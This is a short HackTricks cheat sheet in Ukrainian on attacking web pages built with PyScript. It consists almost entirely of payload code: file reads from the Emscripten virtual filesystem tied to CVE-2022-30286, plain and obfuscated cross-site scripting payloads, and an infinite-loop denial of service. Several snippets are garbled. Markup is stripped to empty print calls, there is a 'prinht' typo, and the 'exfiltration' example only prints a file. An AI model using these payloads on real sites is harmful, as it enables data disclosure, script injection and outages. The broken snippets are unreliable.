# Pyscript
{{#include ../../banners/hacktricks-training.md}}
## Посібник з пентестингу PyScript
PyScript - це новий фреймворк, розроблений для інтеграції Python в HTML, щоб його можна було використовувати разом з HTML. У цьому шпаргалці ви знайдете, як використовувати PyScript для ваших цілей пентестингу.
### Витягування / отримання файлів з віртуальної файлової системи пам'яті Emscripten:
`CVE ID: CVE-2022-30286`\
\
Код:
```html
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin: out
= fin.read() print(out)
```
### [OOB витік даних з файлової системи віртуальної пам'яті Emscripten (моніторинг консолі)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
`CVE ID: CVE-2022-30286`\
\
Код:
```html
x = "CyberGuy" if x == "CyberGuy": with
open('/lib/python3.10/asyncio/tasks.py') as output: contents = output.read()
print(contents) print('
')
```
### Міжсайтовий скриптинг (Звичайний)
Code:
```python
print("
")
```
### Міжсайтовий скриптинг (Python Obfuscated)
Code:
```python
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
```
### Міжсайтовий скриптинг (Обфускація JavaScript)
Code:
```html
prinht("
")
```
### Атака DoS (Безкінечний цикл)
Code:
```html
while True:
print(" ")
```
{{#include ../../banners/hacktricks-training.md}}